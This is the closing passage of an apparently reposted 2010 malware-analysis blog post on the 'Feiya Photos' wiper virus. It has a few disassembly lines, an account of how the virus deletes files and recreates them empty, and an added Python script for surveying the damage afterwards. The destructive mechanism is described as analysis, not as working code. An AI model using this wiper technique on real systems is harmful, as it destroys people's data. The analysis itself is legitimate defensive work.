00467D4C    C745 FC 0F00000>mov dword ptr ss:[ebp-0x4],0xF
00467D53    833D 48934600 0>cmp dword ptr ds:[0x469348],0x0
00467D5A    75 1C           jnz short 电子照.00467D78
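The deletion function above is what produces the "every file is 0 bytes" symptom: for each file returned by `FileSystemObject.GetFolder(...).Files`, `rtcKillFiles` deletes it and `CreateTextFile` immediately recreates an empty file under the same name, so names survive and contents do not. The following script is an added example (not the post's or the sample's code) for the aftermath: it walks a tree, reports that footprint, and models the scope the post observed (system drive untouched, every drive lettered after the CD-ROM untouched). The drive-scope function models the reported behaviour only; the drive enumeration itself is not in the listing. The tree built in `demo()` is constructed for illustration.

```python
"""Post-incident survey for the wiper routine shown in the listing (added example)."""
import os
import tempfile
from pathlib import Path
from typing import Dict, List, Tuple


def zero_byte_files(root: str) -> List[str]:
    """Every regular file under root whose size is 0, as paths relative to root."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = Path(dirpath) / name
            try:
                if path.is_file() and path.stat().st_size == 0:
                    hits.append(str(path.relative_to(root)))
            except OSError:
                continue  # unreadable entry: skip it rather than abort the survey
    return sorted(hits)


def wiped_ratio(root: str) -> float:
    """Fraction of files under root that are empty.

    A value near 1.0 matches the symptom in the post; a handful of empty
    files in an otherwise intact tree is normal and not evidence of the wiper."""
    total = sum(len(files) for _d, _s, files in os.walk(root))
    if total == 0:
        return 0.0
    return len(zero_byte_files(root)) / total


def drives_in_wiper_scope(drives: List[Tuple[str, str]],
                          system_drive: str = "C") -> List[str]:
    """Model of the scope the post reports, not of the malware's own loop.

    drives: (letter, kind) pairs, kind being 'fixed', 'cdrom', etc.
    Per the post: the system drive is untouched, and so is every drive whose
    letter comes after the CD-ROM's, i.e. enumeration stops at the CD-ROM."""
    affected = []
    for letter, kind in sorted(drives):
        if kind == "cdrom":
            break
        if letter.upper() == system_drive.upper():
            continue
        affected.append(letter.upper())
    return affected


def demo() -> Dict[str, object]:
    """Survey a constructed tree: one folder fully wiped, one intact."""
    with tempfile.TemporaryDirectory() as base:
        wiped = Path(base) / "wiped"
        intact = Path(base) / "intact"
        wiped.mkdir()
        intact.mkdir()
        for name in ("photo1.jpg", "thesis.doc", "notes.txt"):
            (wiped / name).write_bytes(b"")            # name kept, content gone
        (intact / "readme.txt").write_bytes(b"still here")
        (intact / "empty.log").write_bytes(b"")         # an innocent empty file
        return {
            "wiped_files": zero_byte_files(str(wiped)),
            "wiped_ratio": wiped_ratio(str(wiped)),
            "intact_ratio": wiped_ratio(str(intact)),
            "scope": drives_in_wiper_scope(
                [("C", "fixed"), ("D", "fixed"), ("E", "cdrom"), ("F", "fixed")]),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Because the original data is unlinked rather than overwritten, the zero-byte survey also gives a recovery tool the exact list of names and directories to look for; the post's low success estimate still stands, since the recreated empty entries may reuse the freed space.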

PS: a word of nonsense: if you like looking at porn pictures and videos, be careful, and don't lose more than you gain.

Original article; when reposting please credit: reposted from obaby@mars

Title of this post: “A Quick Analysis of the ‘妃雅照片’ (Feiya Photos) Virus”

Link to this post: http://www.h4ck.org.cn/2010/11/photo-virus-anylist/
